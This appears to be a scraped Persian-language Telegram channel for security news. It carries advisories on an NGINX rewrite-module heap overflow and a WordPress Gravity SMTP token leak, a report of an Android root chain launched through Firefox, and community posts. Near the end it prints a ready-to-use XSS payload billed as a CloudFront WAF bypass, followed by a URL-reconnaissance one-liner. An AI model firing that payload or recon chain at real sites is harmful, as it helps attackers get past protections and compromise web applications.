World Of Security
5.19K subscribers
45 photos
10 videos
21 files
620 links
Download Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
آسیب‌پذیری بحرانی ۱۸ ساله در NGINX فاش شد: CVE-2026-42945 (NGINX Rift)

یک آسیب‌پذیری بسیار خطرناک با شدت 9.2 در وب‌سرور پرکاربرد NGINX کشف شده که میلیون‌ها سرور را در سراسر جهان تهدید می‌کند. این نقص که NGINX Rift نام گرفته، ریشه در یک باگ ۱۸ ساله دارد و می‌تواند به از کار افتادن سرویس (DoS) و در شرایطی خاص، به اجرای کد از راه دور (RCE) منجر شود.

🔹 مشخصات فنی

    شناسه: CVE-2026-42945

    نوع: Heap Buffer Overflow

    ماژول آسیب‌پذیر: ngx_http_rewrite_module (مرتبط با بازنویسی آدرس)

    علت اصلی: نقص در محاسبه طول رشته‌ها هنگام ترکیب دستورات rewrite حاوی علامت سوال ? با متغیرهای بی‌نام مانند $1. این ناهماهنگی باعث می‌شود داده‌های بزرگ‌تر از بافر تخصیص‌یافته در حافظه نوشته شوند.

🔹 محصولات و نسخه‌های تحت تأثیر

    NGINX Open Source: از نسخه 0.6.27 تا 1.30.0

    NGINX Plus: R32 تا R36

    همچنین NGINX Ingress Controller، App Protect WAF و Gateway Fabric

🔹 پیش‌نیازهای سوءاستفاده
برای آسیب‌پذیری نیاز به دو شرط است:

    پیکربندی خاصی در سرور وجود داشته باشد که دستور rewrite با ? را با متغیرهایی مثل $1 ترکیب کند.

    غیرفعال بودن ASLR (تصادفی‌سازی فضای آدرس) برای دستیابی به اجرای کد. البته با معماری چندپردازه‌ای NGINX، حتی با ASLR فعال هم احتمال سوءاستفاده وجود دارد.

🔹 خطرات اصلی

    قطع سرویس (DoS): از کار انداختن سرور بدون نیاز به احراز هویت.

    اجرای کد از راه دور (RCE): تسلط کامل مهاجم بر سرور (در صورت فعال بودن شرایط).

🔹 راهکار فوری و قطعی
  راهکار قطعی ارتقا به نسخه‌های امن است:

    NGINX Open Source:
ارتقا به نسخه 1.30.1 یا 1.31.0

    NGINX Plus:
دریافت وصله‌های R32 P6، R35 P2، R36 P4 یا مهاجرت به R37

با توجه به شرایط فعلی اینترنت اگر نمیتونید فوری آپدیت کنید از راهکارهای موقت زیر استفاده کنید:

موثرترین اقدام، اصلاح فایل‌های پیکربندی nginx.conf است. از آنجایی که آسیب‌پذیری در الگوی خاصی از دستورات rewrite با متغیرهای بدون نام مانند $1 و $2 نهفته است، جایگزین کردن آن‌ها با متغیرهای نام‌دار، مسیر ایجاد مشکل را مسدود می‌کند.

    الگوی خطرناک (آسیب‌پذیر):
rewrite ^/article/(\d+)$ /show.php?id=$1 last;

    الگوی امن (اصلاح‌شده):
rewrite ^/article/(?P<id>\d+)$ /show.php?id=${id} last;

علاوه بر راهکار اصلی، اقدامات زیر نیز به افزایش امنیت کمک می‌کنند:

    فعال‌سازی ASLR: در صورت امکان، برای دشوارتر کردن سوءاستفاده از آسیب‌پذیری‌، ASLR را فعال کنید.

همچنین نظارت دقیق بر لاگ‌ها پیشنهاد می‌شود.

https://nvd.nist.gov/vuln/detail/CVE-2026-42945
https://github.com/rheodev/CVE-2026-42945
https://github.com/friparia/NGINX_RIFT_SCAN_CVE_2026_42945
https://www.itnews.com.au/news/f5-patches-18-year-old-ai-found-rift-vulnerability-in-nginx-web-server-625881
8
Tomnomnom shares practical techniques for finding vulnerabilities in modern web applications, covering parameter discovery, JavaScript analysis, recon automation, and how to build effective tooling workflows.

https://tomnomnom.com/talks/wwwww.pdf
6
@TryHackBox - @RadioZeroPod قسمت هفتم زیرو تاک
@RadioZeroPod
⭕️ قسمت هفتم زیرو تاک

📌 موضوع جلسه : واقعیت ‌های باگ بانتی در ایران از جذابیت تا سختی ‌هایی که این حوزه دارد

💢 موضوعات برنامه : قسمت اول تعریف واقع بینانه باگ بانتی در ایران

🎙 مهمان برنامه : مهندس مهرشاد علیزاده

منتظر جلسه بعدی باشید.

🎤 راهبر گفتگوی امنیتی : حسین نائیجی

🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
6🔥1
رادیو زیرو پاد
@RadioZeroPod – @TryHackBox - @RadioZeroPod قسمت هفتم زیرو تاک
گفت گوی بنده راجب باگ بانتی با دوستان خوبم radio zero pod
Forwarded from World Of Security
از دوستان هرکسی تمایل به همکاری در شرکت آشنا ایمن ( پوزیشن تست نفوذ ) را دارد
یک رزومه برای بنده ارسال کند.

@nashenas_tm


فقط دوستان توجه کنید که شرایط همکاری به صورت حضوری و تمام وقت هست.
دوستان کسی از deepseek api استفاده کرده ؟؟؟
اگر گزینه بهتری دارید لطفاً بگید بیشتر استفاده ام برای offensive هست به همین دلیل توکن سوزی بالاست تقریبا می‌خوام چیزی باشه هم به صرفه باشه و هم قیمت مناسبی داشته باشه اگر پیشنهادی دارید حتما بگید ممنون میشم.
🚨 آسیب‌پذیری افشای اطلاعات در پلاگین وردپرسی Gravity SMTP
باگی با شناسه CVE-2026-4020 کشف شده که به مهاجمین اجازه می‌ده بدون نیاز به احراز هویت (Unauthenticated) به اطلاعات حساسی مثل API Tokens و Keys دسترسی پیدا کنن. این آسیب‌پذیری به شدت تحت اکسپلویت فعاله؛ اگر از این افزونه استفاده می‌کنید، فوراً اون رو به نسخه 2.1.5 آپدیت کنید.
⚠️ چون ممکنه قبل از آپدیت، اطلاعات شما به سرقت رفته باشه پیشنهاد می‌شه تمامی توکن‌ها و API keyهای مربوط رو باطل و با موارد جدید جایگزین کنید.

https://thehackernews.com/2026/06/hackers-exploit-gravity-smtp-wordpress.html?m=1
3
This media is not supported in your browser
VIEW IN TELEGRAM
کشف زنجیره آسیب‌پذیری جدید: root کردن اندروید ۱۷ از طریق فایرفاکس!
گزارش‌های جدید از کشف یک زنجیره اکسپلویت کامل (Browser-to-Kernel) خبر می‌دهند که تنها با کلیک بر روی یک لینک، دسترسی روت (Root) در اندروید ۱۷ ایجاد می‌کند. این اکسپلویت از یک آسیب‌پذیری روز صفر (0-day) استفاده می‌کند.
🔹 جزئیات کلیدی:
شناسه آسیب‌پذیری: CVE-2026-10702
هدف: مرورگر فایرفاکس در اندروید (نسخه‌های قبل از v151.0.2)
سطح دسترسی: دسترسی کامل از مرورگر تا هسته سیستم‌عامل (Kernel)
🔒 توصیه امنیتی: اگر از مرورگر فایرفاکس روی دستگاه‌های اندرویدی خود استفاده می‌کنید، در اسرع وقت آن را به آخرین نسخه (v151.0.2 یا بالاتر) بروزرسانی کنید و از کلیک بر روی لینک‌های مشکوک خودداری نمایید.
🔥112👍1
XSS: Bypass CloudFront WAF
<object/data="javascript:alert/**/(document.domain)">//</object>
🔥92
Wayback URL Recon - One Liner

curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//' | sort -u
🔥61